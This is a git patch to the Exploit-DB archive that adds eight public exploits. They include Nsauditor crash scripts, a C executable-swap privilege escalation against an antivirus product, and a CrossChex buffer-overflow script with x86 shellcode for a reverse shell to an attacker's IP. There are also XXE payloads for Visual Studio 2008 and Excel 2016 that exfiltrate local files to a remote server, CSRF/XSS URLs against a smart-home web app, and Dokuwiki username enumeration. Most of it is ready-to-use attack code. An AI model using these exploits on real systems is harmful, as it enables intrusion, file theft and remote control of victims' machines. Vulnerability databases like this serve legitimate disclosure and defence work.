From 0f56f2f38c39ffd3ea85b2f59092ecf08a0fd097 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 3 Dec 2019 05:01:42 +0000 Subject: [PATCH] DB: 2019-12-03 8 changes to exploits/shellcodes Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC) Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC) Visual Studio 2008 - XML External Entity Injection Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions Anviz CrossChex 4.3.12 - Local Buffer Overflow Microsoft Excel 2016 1901 - XML External Entity Injection SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery Dokuwiki 2018-04-22b - Username Enumeration --- exploits/php/webapps/47730.txt | 123 ++++++++++++++++++++++++++++ exploits/php/webapps/47731.txt | 37 +++++++++ exploits/windows/dos/47728.py | 35 ++++++++ exploits/windows/dos/47732.py | 37 +++++++++ exploits/windows/local/47733.txt | 133 +++++++++++++++++++++++++++++++ exploits/windows/local/47734.py | 125 +++++++++++++++++++++++++++++ exploits/xml/local/47729.txt | 113 ++++++++++++++++++++++++++ exploits/xml/local/47735.txt | 107 +++++++++++++++++++++++++ files_exploits.csv | 8 ++ 9 files changed, 718 insertions(+) create mode 100644 exploits/php/webapps/47730.txt create mode 100644 exploits/php/webapps/47731.txt create mode 100755 exploits/windows/dos/47728.py create mode 100755 exploits/windows/dos/47732.py create mode 100644 exploits/windows/local/47733.txt create mode 100755 exploits/windows/local/47734.py create mode 100644 exploits/xml/local/47729.txt create mode 100644 exploits/xml/local/47735.txt diff --git a/exploits/php/webapps/47730.txt b/exploits/php/webapps/47730.txt new file mode 100644 index 000000000..bcd16c8d8 --- /dev/null +++ b/exploits/php/webapps/47730.txt @@ -0,0 +1,123 @@ +# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery +# Discovery by: LiquidWorm +# Date: 2019-12-02 +# Vendor Homepage: http://www.gavazzi-automation.com +# Tested Version: 6.5.33.17072501 +# CVE: N/A +# Advisory ID: ZSL-2019-5543 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php + +Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities + + +Vendor: Carlo Gavazzi Automation S.p.A +Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu +Affected version: Web-app: 6.5.33.17072501 + Web-app: 6.5.32.17062101 + Web-app: 6.2.3.16102701 + Web-app: 5.5.3.160421101 + Web-app: 5.3.3.15120101 + Release: 1.0.5.1 + Release: 1.0.5.0 + Release: 1.0.3.5 + Release: 1.0.3.2 + +Summary: Carlo Gavazzi is an international company that develops, manufactures +and sells electrical automation components. Our products are used in industrial +automation and real estate automation. Smart-house is based on a system that we +have developed and produced since 1986, mainly for industrial-related installations. +Our system is present in more than 150,000 installations. For a few years now, we +have focused our development on smart electrical installations for home and property +automation. Smart-house is currently installed in both villas and commercial properties. + +Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application +allows users to perform certain actions via HTTP requests without performing any validity +checks to verify the requests. This can be exploited to perform certain actions with +administrative privileges if a logged-in user visits a malicious web site. Input passed +to several GET/POST parameters is not properly sanitised before being returned to the user. +This can be exploited to execute arbitrary HTML and script code in a user's browser session +in context of an affected site. + +Tested on: Apache + PHP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5543 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php + + +01.11.2019 + +-- + + +Reflected XSS (GET): +-------------------- + +1. http://192.168.0.24/app/index.php?error=Waddup"> (pre-auth) +2. http://192.168.0.24/app/messagepage.php?msg= (pre-auth) +3. http://192.168.0.24/app/detaf.php?p=0&l=50">&f=5658 (post-auth) +4. http://192.168.0.24/app/detaf.php?p=0">&l=50&f=5658 (post-auth) +5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction">&grpl=1 (post-auth) + + +CSRF set temperature: +--------------------- + + + +
+ + + + + + + +
+ + + + +Stored XSS (POST): +------------------ + + + +
+ + + + + + + + + + + +
+ + + + +Reflected XSS (POST): +--------------------- + + + +
+ + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/47731.txt b/exploits/php/webapps/47731.txt new file mode 100644 index 000000000..e78a79dc7 --- /dev/null +++ b/exploits/php/webapps/47731.txt @@ -0,0 +1,37 @@ +# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration +# Date: 2019-12-01 +# Exploit Author: Talha ŞEN +# Vendor Homepage: https://www.dokuwiki.org/dokuwiki +# Software Link: https://download.dokuwiki.org/ +# Version: 2018-04-22b "Greebo" +# Tested on: +# Alpine Linux 3.5 (docker image) +# PHP 5.6.30 +# Apache/2.4.25 (Unix) +# CVE : + +# At login page there is a "set new password" page as below: +# Forgotten your password? Get a new one: Set new password +# At this page there is username enumeration vulnerability. +# Testing for non-valid user: + +POST /doku.php?id=start&do=resendpwd HTTP/1.1 + +sectok=&do=resendpwd&save=1&login=sss + +# Response for non-valid user(sss): + +
Sorry, we can't find this user in our database.
+ +======================================================================== + +# Testing for valid user: + +POST /doku.php?id=start&do=resendpwd HTTP/1.1 + +sectok=&do=resendpwd&save=1&login=admin + +# Response for valid user (admin): + +
There was an unexpected problem communicating with SMTP: Could not open SMTP Port.
+
Looks like there was an error on sending the password mail. Please contact the admin!
\ No newline at end of file diff --git a/exploits/windows/dos/47728.py b/exploits/windows/dos/47728.py new file mode 100755 index 000000000..0f3f7639e --- /dev/null +++ b/exploits/windows/dos/47728.py @@ -0,0 +1,35 @@ +# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC) +# Discovery by: SajjadBnd +# Date: 2019-11-30 +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Tested Version: 3.1.8.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 - Pro + +# About App +# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, +# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that +# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing +# software significantly reduces the total cost of network management in enterprise environments by enabling +# IT personnel and systems administrators gather a wide range of information from all the computers in the network without +# installing server-side applications on these computers and create a report of potential problems that were found. + +# PoC +# 1.Run the python script, it will create a new file "dos.txt" +# 3.Run Nsauditor and click on "Register -> Enter Registration Code" +# 2.Paste the content of dos.txt into the Field: 'Name' +# 6.click 'ok' +# 5.Crashed ;) + + +#!/usr/bin/env python +buffer = "\x41" * 1000 +try: + f=open("dos.txt","w") + print "[+] Creating %s bytes DOS payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/47732.py b/exploits/windows/dos/47732.py new file mode 100755 index 000000000..2c52b2d2e --- /dev/null +++ b/exploits/windows/dos/47732.py @@ -0,0 +1,37 @@ +# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC) +# Discovery by: SajjadBnd +# Date: 2019-11-30 +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Tested Version: 3.1.8.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 - Pro +# Email : blackwolf@post.com + +# About App +# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks +# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise +# network for all potential methods that a hacker might use to attack it and create a report of potential +# problems that were found , Nsauditor network auditing software significantly reduces the total cost of +# network management in enterprise environments by enabling IT personnel and systems administrators gather +# a wide range of information from all the computers in the network without installing server-side applications +# on these computers and create a report of potential problems that were found. + +# POC +# 1.Run the python script, it will create a new file "dos.txt" +# 3.Run Nsauditor and click on "Register -> Enter Registration Code" +# 2.Paste the content of dos.txt into the Field: 'Key' +# 6.click 'ok' +# 5.Crashed ;) + +#!/usr/bin/env python + +buffer = "\x41" * 1000 +try: + f=open("dos.txt","w") + print "[+] Creating %s bytes DOS payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/47733.txt b/exploits/windows/local/47733.txt new file mode 100644 index 000000000..2c4ac32b5 --- /dev/null +++ b/exploits/windows/local/47733.txt @@ -0,0 +1,133 @@ +# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions +# Discovery by: hyp3rlinx +# Date: 2019-12-02 +# Vendor Homepage: www.maxpcsecure.com +# Tested Version: 19.0.4.020 +# CVE: N/A + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt +[+] ISR: ApparitionSec + + +[Vendor] +www.maxpcsecure.com + + +[Affected Product Code Base] +Max Secure Anti Virus Plus - 19.0.4.020 + +File hash: ab1dda23ad3955eb18fdb75f3cbc308a +msplusx64.exe + + +[Vulnerability Type] +Insecure Permissions + + +[CVE Reference] +N/A + + +[Security Issue] +Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. +Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation. + +C:\Program Files\Max Secure Anti Virus Plus>cacls * | more +C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F + BUILTIN\Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + + +[Affected Component] +Permissions on installation directory + + +[Exploit/POC] +#include +#include +#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe" +#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe" +#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp" + +/* Max Secure Anti Virus Plus PoC By hyp3rlinx */ + +BOOL PWNED=FALSE; + +BOOL FileExists(LPCTSTR szPath){ + DWORD dwAttrib = GetFileAttributes(szPath); + return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); +} + +void main(void){ + + if(!FileExists(DISABLED_TARGET)){ + CopyFile(TARGET, TMP, FALSE); + Sleep(1000); + CopyFile(TMP, DISABLED_TARGET, FALSE); + printf("[+] Max Secure Anti Virus Plus EoP PoC\n"); + Sleep(1000); + printf("[+] Disabled MaxSDUI.exe ...\n"); + Sleep(300); + }else{ + PWNED=TRUE; + } + + if(!PWNED){ + char fname[MAX_PATH]; + char newLoc[]=TARGET; + DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); + if (size){ + printf("[+] Copying exploit to vuln dir...\n"); + Sleep(1000); + CopyFile(fname, TARGET, FALSE); + printf("[+] Replaced legit Max Secure EXE...\n"); + Sleep(2000); + printf("[+] Done!\n"); + MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk"); + Sleep(1000); + exit(0); + } + }else{ + if(FileExists(TMP)){ + remove(TMP); + } + printf("[+] Max Secure Anti Virus Plus PWNED!!!\n"); + printf("[+] hyp3rlinx\n"); + system("pause"); + } +} + + +[POC Video URL] +https://www.youtube.com/watch?v=DXSV5geXkTw + + +[Network Access] +Local + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: November 19, 2019 +Vendor: "received a reply they will fix soon" +Status request: November 24, 2019 +No replies other than automated response. +November 29, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/47734.py b/exploits/windows/local/47734.py new file mode 100755 index 000000000..c29323419 --- /dev/null +++ b/exploits/windows/local/47734.py @@ -0,0 +1,125 @@ +# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow +# Date: 2019-11-30 +# Exploit Author: Luis Catarino & Pedro Rodrigues +# Vendor Homepage: https://www.anviz.com/ +# Software Link: https://www.anviz.com/download.html +# Version: Crosschex Standard x86 <= V4.3.12 +# Tested on: 4.3.8.0, 4.3.12 +# CVE : N/A +# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html + +import socket +import time +import sys +import binascii + +# Scapy for the broadcast packet with custom sport +from scapy.all import Raw,IP,Dot1Q,UDP,Ether +import scapy.all + +# shellcode working calc.exe +calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" +calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" +calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" +calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" +calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" +calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" +calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" +calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" +calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" +calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" +calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00" +calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5" +calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a" +calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" + +# shellcode windows x86 reverse_shell +shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" +shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" +shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" +shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" +shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" +shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" +shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" +shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" +shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" +shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" +shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" +shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" +shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68" + +# shellcode windows x86 reverse_shell (part_2) +shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" +shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" +shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" +shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" +shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" +shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" +shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" +shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" +shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" +shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + +def ipToShellcode(ip): + a = ip.split('.') + b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3])) + b = b.replace("0x","") + return binascii.unhexlify(b) + +# sport has to be 5060 +def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060): + request = b"A"*77 # Original payload substitute + request += b"B"*184 + request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe + request += b"A"*4 + # 269 bytes + + if len(sys.argv) > 2: + request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2 + else: + request = request + calculator_payload + + scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] ) + +def setFuzzUDPServer(ip='', port=5050, timeout=150): + try : + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + except: + print('[!] Failed to create server socket') + + try: + s.bind(('', port)) + except: + print('[*] Server socket bind failed') + sys.exit() + + print('[*] Waiting for crosschex') + s.settimeout(timeout) + timeout = time.time() + timeout + responses = [] + + while True: + if time.time() > timeout: + break + try: + response = s.recvfrom(1024) + print(response) + responses.append(response) + sendFuzzingUDPBroadcast(ip=ip) + response = s.recvfrom(1024) + except socket.timeout: + print("[!] Error with UDP server") + + s.close() + return responses + +nargs = len(sys.argv) + +if nargs < 2: + print("[*] Usage: python3 %s []\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445") + sys.exit(0) + +setFuzzUDPServer() \ No newline at end of file diff --git a/exploits/xml/local/47729.txt b/exploits/xml/local/47729.txt new file mode 100644 index 000000000..3b18accf6 --- /dev/null +++ b/exploits/xml/local/47729.txt @@ -0,0 +1,113 @@ +# Exploit Title: Visual Studio 2008 - XML External Entity Injection +# Discovery by: hyp3rlinx +# Date: 2019-12-02 +# Vendor Homepage: www.microsoft.com +# Software Link: Visual Studio 2008 Express IDE +# Tested Version: 2008 +# CVE: N/A + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Visual Studio 2008 Express IDE +vcsetup.exe +File hash: 62f764849e8fcdf8bfbc342685641304 +Download: http://go.microsoft.com/?linkid=7729279 + + +[Vulnerability Type] +XML External Entity Injection 0Day + + +[CVE Reference] +N/A + + +[Security Issue] +Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. +By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the +remote attackers server. + +Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get +associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit. + +[Vuln XXE file types] +.snippet +.i +.s +.asm +.disco +.lst +.inc +.srf +.wsdl +.rgs +.xml + +This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory. + + +[References] +https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/ + + +[Exploit/POC] +"Evil.snippet" or any of the extensions mentioned above. + + + + +%dtd;]> +&send; + + +"payload.dtd" + + +"> +%all; + + +python -m SimpleHTTPServer +python -m http.server (Python3) + + +[POC Video URL] +https://www.youtube.com/watch?v=QOZlwzsbPrk + + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: 3/24/2017 +MSRC sent me link to "Definition of a Security Vulnerability" +Also Product is also not supported anymore. +December 1, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/xml/local/47735.txt b/exploits/xml/local/47735.txt new file mode 100644 index 000000000..422886185 --- /dev/null +++ b/exploits/xml/local/47735.txt @@ -0,0 +1,107 @@ +# Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection +# Discovery by: hyp3rlinx +# Date: 2019-12-02 +# Vendor Homepage: www.microsoft.com +# Tested Version: 2016 v1901 +# CVE: N/A + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Excel 2016 v1901 + +Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. +It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. + + +[CVE] +N/A + + +[Vulnerability Type] +Error Import Based XML External Entity Injection + + +[Security Issue] +Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as +Html page" functionality upon receiving errors importing a specially crafted XML file. + +This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability. + +Tested successfuly Windows 10 .NET framework version v4.0.30319. + +C:\>dir /b %windir%\Microsoft.NET\Framework\v* +v4.0.30319 + + +[Exploit/POC] +Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML' + +1) You will get error like: + +"Error: + +Unable to connect + +We encountered an error while trying to connect. + +The user will then get an option to 'Edit' where they can import the file as an HTML file + +Result Local data can be exfiltrated to remote server" + +2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel + +User has choose to import as HTML then XXE attack will succeed: + +e.g. + +127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO +/1.1" 200 - + + +Malicious XML file to load as New Data Query + +"test.xml" + + + + +%dtd;]> +&send; + + + +[Network Access] +Local + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: May 10, 2019 +MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. +Engineering Team may or may not fix in a future version of the release." +November 30, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index abb7ab111..f0d1b99a4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6614,6 +6614,8 @@ id,file,description,date,author,type,platform,port 47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios, 47723,exploits/windows/dos/47723.py,"SpotAuditor 5.3.2 - 'Key' Denial of Service",2019-11-29,ZwX,dos,windows, 47727,exploits/windows/dos/47727.py,"SpotAuditor 5.3.2 - 'Name' Denial of Service",2019-11-29,ZwX,dos,windows, +47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows, +47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10817,6 +10819,10 @@ id,file,description,date,author,type,platform,port 47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows, 47724,exploits/windows/local/47724.txt,"TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path",2019-11-29,"Cristian Ayala G",local,windows, 47726,exploits/linux/local/47726.sh,"Bash 5.0 Patch 11 - SUID Priv Drop Exploit",2019-11-29,"Mohin Paramasivam",local,linux, +47729,exploits/xml/local/47729.txt,"Visual Studio 2008 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml, +47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows, +47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows, +47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42039,3 +42045,5 @@ id,file,description,date,author,type,platform,port 47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php, 47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android, 47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php, +47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php, +47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,